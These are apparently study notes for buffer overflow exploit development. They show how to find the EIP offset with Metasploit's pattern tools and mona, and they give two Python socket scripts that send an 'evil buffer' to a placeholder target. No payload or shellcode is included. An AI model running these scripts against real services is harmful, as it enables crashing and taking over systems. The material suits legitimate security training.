Finding the offset

Generate a cyclic pattern 400 bytes longer than where the application has crashed at

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

Example of a script to find the offset

import socket

ip = <target ip>
port = <target port>

prefix = "<command to test> "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = "<generated cyclic pattern with msfvenom>"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

Finding the offset

!mona findmsp -distance 2400

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2400 -q <EIP address>

Check if the offset is correct by overwriting the EIP with "BBBB" aka 42424242

import socket

ip = <target ip>
port = <target port>

prefix = "<command to test> "
offset = "<offset value>"
overflow = "A" * offset
retn = "BBBB"
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")